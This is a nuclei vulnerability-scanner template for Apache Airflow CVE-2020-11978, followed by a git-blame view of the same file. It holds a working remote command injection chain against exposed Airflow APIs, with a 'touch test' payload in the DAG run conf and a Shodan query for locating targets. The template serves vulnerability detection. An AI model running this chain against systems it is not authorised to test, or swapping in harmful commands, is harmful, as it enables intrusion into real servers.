nuclei-templates/cves/2020/CVE-2020-11978.yaml

id: CVE-2020-11978

info:
  name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution
  author: pdteam
  severity: high
  description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
  reference:
    - https://github.com/pberba/CVE-2020-11978
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
    - https://twitter.com/wugeej/status/1400336603604668418
    - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-11978
    cwe-id: CWE-77
  metadata:
    shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs"
    verified: "true"
  tags: cve,cve2020,apache,airflow,rce,cisa

requests:
  - raw:
      - |
        GET /api/experimental/test HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

      - |
        GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

      - |
        POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"conf": {"message": "\"; touch test #"}}

      - |
        GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    extractors:
      - type: regex
        name: exec_date
        part: body
        group: 1
        internal: true
        regex:
          - '"execution_date":"([0-9-A-Z:+]+)"'

    req-condition: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_4, "operator":"BashOperator")'
          - 'contains(all_headers_4, "application/json")'
        condition: and
Added CVE-2020-11978 2021-06-03 08:27:09 +00:00			`id: CVE-2020-11978`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00
Added CVE-2020-11978 2021-06-03 08:27:09 +00:00			`info:`
			`name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution`
			`author: pdteam`
			`severity: high`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://github.com/pberba/CVE-2020-11978`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-11978`
			`- https://twitter.com/wugeej/status/1400336603604668418`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 8.8`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2020-11978`
			`cwe-id: CWE-77`
Update metadata query (#4350) * Update adobe-component-login.yaml * Update cold-fusion-cfcache-map.yaml * Update unpatched-coldfusion.yaml * Update coldfusion-debug-xss.yaml * Update CVE-2020-11978.yaml * Update CVE-2020-13927.yaml * Update CVE-2021-38540.yaml * Update CVE-2021-44451.yaml * Update CVE-2022-24288.yaml * Update airflow-debug.yaml * Update airflow-detect.yaml * Update CVE-2010-0219.yaml * Update apache-axis-detect.yaml * Update CVE-2020-11991.yaml * Update apache-cocoon-detect.yaml * Update CVE-2021-21402.yaml * Update jellyfin-detect.yaml * Update CVE-2021-21402.yaml * Update CVE-2021-21402.yaml * Update ecology-arbitrary-file-upload.yaml * Update ecology-v8-sqli.yaml * Update ecology-syncuserinfo-sqli.yaml * Update ecology-filedownload-directory-traversal.yaml * Update CNVD-2021-15822.yaml * Update dedecms-carbuyaction-fileinclude.yaml * Update dedecms-openredirect.yaml * Update tamronos-rce.yaml * Update natshell-path-traversal.yaml 2022-05-12 14:18:36 +00:00			`metadata:`
			`shodan-query: http.html:"Apache Airflow" \|\| title:"Airflow - DAGs"`
Auto Generated CVE annotations [Thu Jun 16 04:52:10 UTC 2022] :robot: 2022-06-16 04:52:10 +00:00			`verified: "true"`
metadata-update 2022-06-16 04:35:56 +00:00			`tags: cve,cve2020,apache,airflow,rce,cisa`
Added CVE-2020-11978 2021-06-03 08:27:09 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`GET /api/experimental/test HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`

			`- \|`
			`GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`

			`- \|`
			`POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/json`

			`{"conf": {"message": "\"; touch test #"}}`

			`- \|`
			`GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`

			`extractors:`
			`- type: regex`
			`name: exec_date`
			`part: body`
			`group: 1`
			`internal: true`
			`regex:`
			`- '"execution_date":"([0-9-A-Z:+]+)"'`

			`req-condition: true`
			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(body_4, "operator":"BashOperator")'`
			`- 'contains(all_headers_4, "application/json")'`
Merge branch 'Update-metadata-query' of https://github.com/ritikchaddha/nuclei-templates into ritikchaddha-Update-metadata-query 2022-06-16 04:33:41 +00:00			`condition: and`